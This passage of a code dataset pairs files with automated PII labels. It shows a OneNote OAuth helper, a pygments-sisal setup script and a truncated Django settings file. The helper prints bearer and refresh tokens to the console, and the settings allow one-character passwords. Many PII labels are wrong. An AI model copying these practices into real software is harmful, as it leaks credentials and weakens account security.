'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.sourceDestCheck.sh'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'instance.mo'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.mo'], ['URL', 'instance.sourceDestCheck.sh'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'instance.mo'], ['URL', 'instance.sourceDestCheck.sh'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'data.sh'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.cr'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.gr'], ['URL', '.id.sh'], ['URL', 'group.id'], ['URL', 'instance.gr'], ['URL', '.name.sh'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'conn.ru'], ['URL', 'group.id'], ['URL', 'reservation.in'], ['URL', 'instance.gr'], ['URL', '.id.sh'], ['URL', 'group.id'], ['URL', 'instance.gr'], ['URL', '.name.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.in'], ['URL', 'type.sh'], ['URL', 'boto.ec2.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.placement.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.placement.sh'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'cidr.should.co'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.cr'], ['URL', 'client.mo'], ['URL', 'client.ru'], ['URL', 'instance.should.co'], ['URL', 'instance.should.co'], ['URL', '.should.be.gr'], ['URL', '.should.be.gr'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'vpc.id'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'conn.ru'], ['URL', 'subnet.id'], ['URL', 'group1.na'], ['URL', 'group2.id'], ['URL', 'reservation.in'], ['URL', 'conn.ge'], ['URL', 'enis.sh'], ['URL', 'instance.interfaces.sh'], ['URL', 'instance.int'], ['URL', '.id.sh'], ['URL', 'eni.id'], ['URL', 'instance.su'], ['URL', 'id.sh'], ['URL', 'subnet.id'], ['URL', 'instance.groups.sh'], ['URL', 'group.id'], ['URL', 'instance.gr'], ['URL', 'group1.id'], ['URL', 'group2.id'], ['URL', 'eni.su'], ['URL', 'id.sh'], ['URL', 'subnet.id'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group1.id'], ['URL', 'group2.id'], ['URL', 'eni.pr'], ['URL', 'addresses.sh'], ['URL', 'eni.pr'], ['URL', 'address.sh'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'vpc.id'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'subnet.id'], ['URL', 'group1.id'], ['URL', 'boto.ec2.net'], ['URL', 'eni.id'], ['URL', 'conn.ru'], ['URL', 'group2.id'], ['URL', 'reservation.in'], ['URL', 'instance.su'], ['URL', 'id.sh'], ['URL', 'subnet.id'], ['URL', 'conn.ge'], ['URL', 'enis.sh'], ['URL', 'instance.interfaces.sh'], ['URL', 'instance.int'], ['URL', 'eni.id.sh'], ['URL', 'eni.id'], ['URL', 'eni.su'], ['URL', 'id.sh'], ['URL', 'subnet.id'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group1.id'], ['URL', 'group2.id'], ['URL', 'eni.pr'], ['URL', 'addresses.sh'], ['URL', 'eni.pr'], ['URL', 'address.sh'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'vpc.id'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'conn.ru'], ['URL', 'group1.id'], ['URL', 'reservation.in'], ['URL', 'conn.cr'], ['URL', 'subnet.id'], ['URL', 'group2.id'], ['URL', 'instance.interfaces.sh'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group2.id'], ['URL', 'conn.at'], ['URL', 'eni.id'], ['URL', 'instance.id'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.at'], ['URL', 'eni.id'], ['URL', 'instance.id'], ['URL', 'instance.interfaces.sh'], ['URL', 'instance.int'], ['URL', 'eni.id.sh'], ['URL', 'eni.id'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group1.id'], ['URL', 'group2.id'], ['URL', 'conn.ge'], ['URL', 'eni.id'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group1.id'], ['URL', 'group2.id'], ['URL', 'conn.de'], ['URL', 'eni.attachment.id'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.de'], ['URL', 'eni.attachment.id'], ['URL', 'instance.interfaces.sh'], ['URL', 'conn.ge'], ['URL', 'eni.id'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group2.id'], ['URL', 'conn.de'], ['URL', 'cm.value.code.sh'], ['URL', 'InvalidAttachmentID.No'], ['URL', 'cm.value.status.sh'], ['URL', 'cm.value.re'], ['URL', 'id.sh'], ['URL', 'not.be.no'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'address.sh'], ['URL', 'name.should.co'], ['URL', 'address.re'], ['URL', 'instance.pr'], ['URL', 'address.sh'], ['URL', 'instance.pr'], ['URL', 'name.should.co'], ['URL', 'instance.pr'], ['URL', 'address.re'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.ke'], ['URL', 'name.sh'], ['URL', 'boto3.cl'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'client.de'], ['URL', 'boto3.cl'], ['URL', 'client.ru'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'boto3.cl'], ['URL', 'client.ru'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'volume.cr'], ['URL', 'snapshot.sn'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'client.de'], ['URL', 'snapshot.sn'], ['URL', 'boto.co'], ['URL', 'conn.ge'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'conn.ge'], ['URL', 'status.status.sh'], ['URL', 'status.status.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.ru'], ['URL', 'conn.ge'], ['URL', 'instance.id'], ['URL', '.id.sh'], ['URL', 'instance.id'], ['URL', 'conn.ge'], ['URL', 'instance.id'], ['URL', 'cm.value.code.sh'], ['URL', 'InvalidInstanceID.No'], ['URL', 'cm.value.status.sh'], ['URL', 'cm.value.re'], ['URL', 'id.sh'], ['URL', 'not.be.no'], ['URL', 'boto3.cl'], ['URL', 'conn.ru'], ['URL', 'conn.de'], ['URL', 'boto3.cl'], ['URL', 'conn.ru'], ['URL', 'conn.st'], ['URL', 'conn.de'], ['URL', 'conn.de'], ['URL', 'conn.de'], ['URL', 'conn.de'], ['URL', 'conn.de'], ['URL', 'conn.de'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.st'], ['URL', 'conn.ge'], ['URL', 'status.sh'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'name.sh'], ['URL', 'conn.ge'], ['URL', 'status.sh'], ['URL', 's.id'], ['URL', 'instance1.id'], ['URL', 'status1.st'], ['URL', 'name.sh'], ['URL', 's.id'], ['URL', 'instance2.id'], ['URL', 'status2.st'], ['URL', 'name.sh'], ['URL', 's.id'], ['URL', 'instance3.id'], ['URL', 'status3.st'], ['URL', 'name.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'conn.ge'], ['URL', 'conn.cr'], ['URL', 'conn.mo'], ['URL', 'instance.id'], ['URL', 'group.id'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.mo'], ['URL', 'instance.id'], ['URL', 'group.id'], ['URL', 'group.in'], ['URL', 'instance.id'], ['URL', 'boto3.re'], ['URL', 'client.cr'], ['URL', '.should.be'], ['URL', 'instance.mo'], ['URL', '.should.be'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'optimized.should.be'], ['URL', 'instance.mo'], ['URL', 'optimized.should.be'], ['URL', 'resource.cr'], ['URL', 'optimized.should.be'], ['URL', 'boto3.cl'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', '.should.be'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'client.de'], ['URL', 'response.should.have.ke'], ['URL', 'response.should.have.ke'], ['URL', '.should.be'], ['URL', 'client.de'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'boto3.re'], ['URL', 'ec2.cr']]" +69,""""""" +PyOneNote.py +~~~~~~~~~~~~~~~~~ + +This module contains a basic OAuth 2 Authentication and basic handler for GET and POST operations. +This work was just a quick hack to migrate notes from and old database to onenote but should hep you to understand +the request structure of OneNote. + +Copyright (c) 2016 Coffeemug13. All rights reserved. Licensed under the MIT license. +See LICENSE in the project root for license information. +"""""" + +import requests + + +class OAuth(): + """"""Handles the authentication for all requests"""""" + + def __init__(self, client_id, client_secret, code=None, token=None, refresh_token=None): + """""" This information is obtained upon registration of a new Outlook Application + The values are just for information and not valid + :param client_id: ""cda3ffaa-2345-a122-3454-adadc556e7bf"" + :param client_secret: ""AABfsafd6Q5d1VZmJQNsdac"" + :param code: = ""PI:KEY"" + :param token: = ""EAFSDTBRB$/UGCCXc8wU/zFu9QnLdZXy+YnElFkAAW......"" + :param rtoken: = ""MCKKgf55PCiM2aACbIYads*sdsa%*PWYNj436348v......"" """""" + self.client_id = client_id + self.client_secret = client_secret + self.code = code + self.token = token + self.rtoken = refresh_token + self.redirect_uri = 'https://localhost' + self.session = requests.Session() + + @staticmethod + def get_authorize_url(client_id): + ""open this url in a browser to let the user grant access to onenote. Extract from the return URL your access code"" + url = ""https://login.live.com/oauth20_authorize.srf?client_id={0}&scope=wl.signin%20wl.offline_access%20wl.basic%20office.onenote_create&response_type=code&redirect_uri=https://localhost"".format( + client_id) + return url + + def get_token(self): + """""" + Make the following request with e.g. postman: + POST https://login.live.com/oauth20_token.srf + Content-Type:application/x-www-form-urlencoded + + grant_type:authorization_code + client_id:cda3ffaa-2345-a122-3454-adadc556e7bf + client_secret:AABfsafd6Q5d1VZmJQNsdac + code:111111111-1111-1111-1111-111111111111 + redirect_uri:https://localhost + + OneNote will return as result: + { + ""token_type"": ""bearer"", + ""expires_in"": 3600, + ""scope"": ""wl.signin wl.offline_access wl.basic office.onenote_create office.onenote"", + ""access_token"": ""AxxdWR1DBAAUGCCXc8wU/...."", + ""refresh_token"": ""DR3DDEQJPCiM2aACbIYa...."", + ""user_id"": ""AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"" + } + """""" + raise NotImplementedError("""") + + def refresh_token(self): + """""" + Make the following reqest to refresh you token with e.g. postman: + POST https://login.live.com/oauth20_token.srf + Content-Type:application/x-www-form-urlencoded + + grant_type:refresh_token + client_id:cda3ffaa-2345-a122-3454-adadc556e7bf + client_secret:AABfsafd6Q5d1VZmJQNsdac + refresh_token:DR3DDEQJPCiM2aACbIYa.... + redirect_uri:https://localhost + --> + { + ""token_type"": ""bearer"", + ""expires_in"": 3600, + ""scope"": ""wl.signin wl.offline_access wl.basic office.onenote_create office.onenote"", + ""access_token"": ""EAFSDTBRB$/UGCCXc8wU/zFu9QnLdZXy+YnElFkAAW..."", + ""refresh_token"": ""DSFDSGSGFABDBGFGBFGF5435kFGDd2J6Bco2Pv2ss..."", + ""user_id"": ""AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"" + } + """""" + url = 'https://login.live.com/oauth20_token.srf' + headers = {""Content-Type"": ""application/x-www-form-urlencoded""} + data = {""grant_type"": ""refresh_token"", + ""client_id"": self.client_id, + ""client_secret"": self.client_secret, + ""refresh_token"": self.rtoken, + ""redirect_uri"": self.redirect_uri} + + result = self.session.post(url, headers=headers, data=data) + + print(""Refreshed token: "" + result.text) + refresh = result.json() + self.expire = refresh.get('expires_in') + self.token = refresh.get('access_token') + self.rtoken = refresh.get('refresh_token') + print(""Token: "" + self.token) + print(""Refresh Token: "" + self.rtoken) + return True + + def _get(self, url, query): + """"""Handles GET Request with Authentication"""""" + headers = {'user-agent': 'my-app/0.0.1', 'Authorization': 'Bearer ' + self.token} + result = self.session.get(url, headers=headers, params=query) + print(""GET "" + result.url) + print(result.headers) + if (result.text): + print(result.text) + return result + + def _post(self, url: str, headers: list, data: str = None, files: list = None): + """"""Handles POST Request with Authentication"""""" + newHeaders = {'user-agent': 'my-app/0.0.1', 'Authorization': 'Bearer ' + self.token} + if data: + newHeaders.update(headers) + result = self.session.post(url, headers=newHeaders, data=data) + else: + result = self.session.post(url, headers=newHeaders, files=files) + # result.request.headers + print(""POST "" + result.url) + print(result.headers) + if (result.text): + print(result.text) + return result + + def post(self, url: str, headers: list, data: str = None, files: list = None): + """"""post something and handle token expire transparent to the caller"""""" + try: + result = self._post(url, headers, data=data, files=files) + if (result.status_code not in (200, 201)): + print(""Error: "" + str(result.status_code)) + if (result.status_code == 401): + print(""Refreshing token"") + if self.refresh_token(): + result = self._post(url, headers, data, files=files) + else: + print('Failed retry refreshing token') + return result + except Exception as e: + print(e) + pass + + def get(self, url, query, headers=None): + """"""get something and handle token expire transparent to the caller"""""" + try: + result = self._get(url, query) + if (result.status_code != requests.codes.ok): + print(""Error: "" + str(result.status_code)) + if (result.status_code == 401): + print(""Refreshing token"") + if self.refresh_token(): + result = self._get(url, query) + else: + print('Failed retry refreshing token') + return result + except Exception as e: + print(e) + pass + + def get_credentials(self): + """"""Return the actual credentials of this OAuth Instance + :return client_id:"""""" + return self.client_id, self.client_secret, self.code, self.token, self.rtoken + + +class OneNote(OAuth): + """"""This class wraps some OneNote specific calls"""""" + def __init__(self, client_id, client_secret, code, token, rtoken): + super().__init__(client_id, client_secret, code, token, rtoken) + self.base = ""https://www.onenote.com/api/v1.0/me/"" + + def list_notebooks(self): + url = self.base + ""notes/notebooks"" + query = {'top': '5'} + result = self.get(url, query) + n = None + if (result): + notebooks = result.json() + # result_serialized = json.dumps(result.text) + # notebook = json.loads(result_serialized) + n = notebooks[""value""][0] + x = 1 + return n + + def post_page(self, section_id: str, created, title: str, content: str, files: list = None): + """"""post a page. If you want to provide additional images to the page provide them as file list + in the same way like posting multipart message in 'requests' + .:param content: valid html text with Umlaute converted to ä"""""" + url = self.base + ""notes/sections/"" + section_id + ""/pages"" + headers = {""Content-Type"": ""application/xhtml+xml""} + # the basic layout of a page is always same + data = """""" + + + {0} + + + +
    + {2} +
    + + +"""""".format(title, created, content) + result = None + if files: + ""post as multipart"" + newFiles = [('Presentation', (None, data, 'application/xhtml+xml', {'Content-Encoding': 'utf8'}))] + newFiles.extend(files) + result = self.post(url, {}, None, files=newFiles) + else: + ""post as simple request"" + result = self.post(url, headers, data) + n = None + if (result): + notebooks = result.json() + # result_serialized = json.dumps(result.text) + # notebook = json.loads(result_serialized) + # n = notebooks[""value""][0] + x = 1 + return notebooks +",9316,"[['URL', 'https://login.live.com/oauth20_authorize.srf?client_id={0}&scope=wl.signin%20wl.offline_access%20wl.basic%20office.onenote_create&response_type=code&redirect_uri=https://localhost"".format'], ['URL', ""https://login.live.com/oauth20_token.srf'""], ['DATE_TIME', '2016'], ['PERSON', 'self.rtoken ='], ['PERSON', 'self.rtoken'], ['URL', 'self.se'], ['PERSON', 'self.rtoken'], ['URL', 'self.session.ge'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'result.st'], ['URL', 'requests.co'], ['LOCATION', 'self.base'], ['LOCATION', 'self.base'], ['URL', 'self.ba'], ['URL', 'self.ge'], ['PERSON', 'Umlaute'], ['LOCATION', 'self.base'], ['URL', 'self.ba'], ['URL', 'https://login.live.com/oauth20_token.srf'], ['URL', 'https://login.live.com/oauth20_token.srf'], ['URL', 'https://www.onenote.com/api/v1.0/me/""'], ['URL', 'PyOneNote.py'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.to'], ['URL', 'self.red'], ['URL', 'self.se'], ['URL', 'requests.Se'], ['URL', 'wl.si'], ['URL', 'wl.ba'], ['URL', 'wl.si'], ['URL', 'wl.ba'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.red'], ['URL', 'refresh.ge'], ['URL', 'self.to'], ['URL', 'refresh.ge'], ['URL', 'refresh.ge'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'result.re'], ['URL', 'result.st'], ['URL', 'result.st'], ['URL', 'result.st'], ['URL', 'self.re'], ['URL', 'result.st'], ['URL', 'result.st'], ['URL', 'self.re'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.to'], ['URL', 'self.ba']]" +70,"""""""pygments-sisal module setup script for distribution."""""" + +from __future__ import with_statement + +import os +import setuptools + + +def get_version(filename): + with open(filename) as fh: + for line in fh: + if line.startswith('__version__'): + return line.split('=')[-1].strip()[1:-1] + + +setuptools.setup( + name='pygments-sisal', + version=get_version(os.path.join('pygments_sisal', '__init__.py')), + author='Alexander Asp Bock', + dummy@email.com', + platforms='All', + description=('A pygments lexer for SISAL'), + install_requires=['Pygments>=2.0'], + license='MIT', + keywords='pygments, lexer, sisal', + url='https://github.com/MisanthropicBit/pygments-sisal', + packages=setuptools.find_packages(), + long_description=open('README.md').read(), + classifiers=[ + 'Development Status :: 5 - Production/Stable', + 'Intended Audience :: Developers', + 'Topic :: Utilities', + 'License :: OSI Approved :: MIT License', + 'Programming Language :: Python :: 2.6', + 'Programming Language :: Python :: 2.7', + 'Programming Language :: Python :: 3', + 'Programming Language :: Python :: 3.2', + 'Programming Language :: Python :: 3.3', + 'Programming Language :: Python :: 3.4', + 'Programming Language :: Python :: 3.5' + ], + # Pygments entry point + entry_points=""[pygments.lexers]\n"" + ""sisal=pygments_sisal:SisalLexer"" +) +",1467,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', ""Asp Bock'""], ['URL', ""https://github.com/MisanthropicBit/pygments-sisal',""], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ' :: '], ['URL', 'line.st'], ['URL', 'setuptools.se'], ['URL', 'os.path.jo'], ['URL', 'email.com'], ['URL', 'setuptools.fi'], ['URL', 'README.md']]" +71,"# -*- coding: utf-8 -*- +"""""" +Django settings for saefacto project. + +For more information on this file, see +https://docs.djangoproject.com/en/dev/topics/settings/ + +For the full list of settings and their values, see +https://docs.djangoproject.com/en/dev/ref/settings/ +"""""" + +# Build paths inside the project like this: os.path.join(BASE_DIR, ...) +import os +from os.path import join + +# See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings +try: + from S3 import CallingFormat + AWS_CALLING_FORMAT = CallingFormat.SUBDOMAIN +except ImportError: + # TODO: Fix this where even if in Dev this class is called. + pass + +from configurations import Configuration, values + +BASE_DIR = os.path.dirname(os.path.dirname(__file__)) + + +class Common(Configuration): + + ########## APP CONFIGURATION + DJANGO_APPS = ( + # Default Django apps: + 'django.contrib.auth', + 'django.contrib.contenttypes', + 'django.contrib.sessions', + 'django.contrib.sites', + 'django.contrib.messages', + 'django.contrib.staticfiles', + + # Useful template tags: + # 'django.contrib.humanize', + # 'suit', + # Admin + 'django.contrib.admin', + 'django.contrib.admindocs', + ) + THIRD_PARTY_APPS = ( + 'south', # Database migration helpers: + 'crispy_forms', # Form layouts + 'avatar', # for user avatars + 'sitetree', + 'sitetree_smartadmin', + 'django_user_agents', + 'statici18n', # javascript + 'parsley', + + ) + + # Apps specific for this project go here. + LOCAL_APPS = ( + 'users', # custom users app + 'core', + 'main', + ) + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps + INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS + + INSTALLED_APPS += ( + # Needs to come last for now because of a weird edge case between + # South and allauth + 'allauth', # registration + 'allauth.account', # registration + 'allauth.socialaccount', # registration + ) + ########## END APP CONFIGURATION + + ########## MIDDLEWARE CONFIGURATION + MIDDLEWARE_CLASSES = ( + 'django.contrib.sessions.middleware.SessionMiddleware', + 'django.middleware.common.CommonMiddleware', + 'django.middleware.csrf.CsrfViewMiddleware', + 'django.contrib.auth.middleware.AuthenticationMiddleware', + 'django.contrib.messages.middleware.MessageMiddleware', + 'django.middleware.clickjacking.XFrameOptionsMiddleware', + 'django_user_agents.middleware.UserAgentMiddleware', + ) + ########## END MIDDLEWARE CONFIGURATION + + ########## DEBUG + # See: https://docs.djangoproject.com/en/dev/ref/settings/#debug + DEBUG = values.BooleanValue(False) + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug + TEMPLATE_DEBUG = DEBUG + ########## END DEBUG + + ########## SECRET CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key + # Note: This key only used for development and testing. + # In production, this is changed to a values.SecretValue() setting + SECRET_KEY = ""CHANGEME!!!"" + ########## END SECRET CONFIGURATION + + ########## FIXTURE CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS + FIXTURE_DIRS = ( + join(BASE_DIR, 'fixtures'), + ) + ########## END FIXTURE CONFIGURATION + + ########## EMAIL CONFIGURATION + EMAIL_BACKEND = values.Value('django.core.mail.backends.smtp.EmailBackend') + ########## END EMAIL CONFIGURATION + + ########## MANAGER CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#admins + ADMINS = ( + ('Fábio C. Barrionuevo da Luz', dummy@email.com'), + ) + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#managers + MANAGERS = ADMINS + ########## END MANAGER CONFIGURATION + + ########## DATABASE CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#databases + DATABASES = values.DatabaseURLValue('postgres://localhost/saefacto') + ########## END DATABASE CONFIGURATION + + ########## CACHING + # Do this here because thanks to django-pylibmc-sasl and pylibmc memcacheify is painful to install on windows. + # memcacheify is what's used in Production + CACHES = { + 'default': { + 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', + 'LOCATION': '' + } + } + ########## END CACHING + + ########## GENERAL CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#time-zone + TIME_ZONE = 'America/Araguaina' + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code + LANGUAGE_CODE = 'pt-br' + LANGUAGES = ( + ('pt-br', u'Português do Brasil'), + ('en', 'English'), + ('es', u'Español'), + ) + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id + SITE_ID = 1 + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n + USE_I18N = True + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n + USE_L10N = True + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz + USE_TZ = True + ########## END GENERAL CONFIGURATION + + ########## TEMPLATE CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors + TEMPLATE_CONTEXT_PROCESSORS = ( + 'django.contrib.auth.context_processors.auth', + ""allauth.account.context_processors.account"", + ""allauth.socialaccount.context_processors.socialaccount"", + 'django.core.context_processors.debug', + 'django.core.context_processors.i18n', + 'django.core.context_processors.media', + 'django.core.context_processors.static', + 'django.core.context_processors.tz', + 'django.contrib.messages.context_processors.messages', + 'django.core.context_processors.request', + # Your stuff: custom template context processers go here + ) + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs + TEMPLATE_DIRS = ( + join(BASE_DIR, 'templates'), + ) + + TEMPLATE_LOADERS = ( + 'django.template.loaders.filesystem.Loader', + 'django.template.loaders.app_directories.Loader', + ) + + # See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs + CRISPY_TEMPLATE_PACK = 'bootstrap3' + ########## END TEMPLATE CONFIGURATION + + ########## STATIC FILE CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root + STATIC_ROOT = join(os.path.dirname(BASE_DIR), 'staticfiles') + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url + STATIC_URL = '/static/' + + # See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS + STATICFILES_DIRS = ( + join(BASE_DIR, 'static'), + ) + + # See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders + STATICFILES_FINDERS = ( + 'django.contrib.staticfiles.finders.FileSystemFinder', + 'django.contrib.staticfiles.finders.AppDirectoriesFinder', + ) + ########## END STATIC FILE CONFIGURATION + + ########## MEDIA CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root + MEDIA_ROOT = join(BASE_DIR, 'media') + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url + MEDIA_URL = '/media/' + ########## END MEDIA CONFIGURATION + + ########## URL Configuration + ROOT_URLCONF = 'config.urls' + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application + WSGI_APPLICATION = 'config.wsgi.application' + ########## End URL Configuration + + ########## AUTHENTICATION CONFIGURATION + AUTHENTICATION_BACKENDS = ( + ""django.contrib.auth.backends.ModelBackend"", + ""allauth.account.auth_backends.AuthenticationBackend"", + ) + + # Some really nice defaults + ACCOUNT_AUTHENTICATION_METHOD = ""username"" + ACCOUNT_EMAIL_REQUIRED = True + ACCOUNT_EMAIL_VERIFICATION = ""mandatory"" + ACCOUNT_PASSWORD_MIN_LENGTH = 1 + ########## END AUTHENTICATION CONFIGURATION + + ########## Custom user app defaults + # Select the correct user model + AUTH_USER_MODEL = ""users.User"" + LOGIN_REDIRECT_URL = ""users:redirect"" + ########## END Custom user app defaults + + ########## SLUGLIFIER + AUTOSLUG_SLUGIFY_FUNCTION = ""slugify.slugify"" + ########## END SLUGLIFIER + + ########## LOGGING CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#logging + # A sample logging configuration. The only tangible logging + # performed by this configuration is to send an email to + # the site admins on every HTTP 500 error when DEBUG=False. + # See http://docs.djangoproject.com/en/dev/topics/logging for + # more details on how to customize your logging configuration. + LOGGING = { + 'version': 1, + 'disable_existing_loggers': False, + 'filters': { + 'require_debug_false': { + '()': 'django.utils.log.RequireDebugFalse' + } + }, + 'handlers': { + 'mail_admins': { + 'level': 'ERROR', + 'filters': ['require_debug_false'], + 'class': 'django.utils.log.AdminEmailHandler' + } + }, + 'loggers': { + 'django.request': { + 'handlers': ['mail_admins'], + 'level': 'ERROR', + 'propagate': True, + }, + } + } + ########## END LOGGING CONFIGURATION + + + ########## Your common stuff: Below this line define 3rd party libary settings + + +class Local(Common): + + ########## DEBUG + DEBUG = values.BooleanValue(True) + TEMPLATE_DEBUG = DEBUG + ########## END DEBUG + + ########## INSTALLED_APPS + INSTALLED_APPS = Common.INSTALLED_APPS + ########## END INSTALLED_APPS + + ########## Mail settings + EMAIL_HOST = ""localhost"" + EMAIL_PORT = 1025 + EMAIL_BACKEND = values.Value('django.core.mail.backends.console.EmailBackend') + ########## End mail settings + ########## DATABASE CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#databases + #DATABASES = values.DatabaseURLValue('postgres://localhost/projetosgt') + DATABASES = values.DatabaseURLValue('sqlite:////{0}.sqlite'.format(join(BASE_DIR, 'sae_db'))) + ########## END DATABASE CONFIGURATION + + ########## django-debug-toolbar + MIDDLEWARE_CLASSES = Common.MIDDLEWARE_CLASSES + ('debug_toolbar.middleware.DebugToolbarMiddleware',) + INSTALLED_APPS += ('debug_toolbar',) + + INTERNAL_IPS = ('127.0.0.1',) + + DEBUG_TOOLBAR_CONFIG = { + 'INTERCEPT_REDIRECTS': False, + 'SHOW_TEMPLATE_CONTEXT': True, + } + ########## end django-debug-toolbar + + ########## Your local stuff: Below this line define 3rd party libary settings + #SITETREE_MODEL_TREE = 'sitetree_smartadmin.SmartTree' + SITETREE_MODEL_TREE_ITEM = 'sitetree_smartadmin.SmartTreeItem' + +class Production(Common): + + ########## INSTALLED_APPS + INSTALLED_APPS = Common.INSTALLED_APPS + INSTALLED_APPS += ('allauth.socialaccount.providers.facebook', + 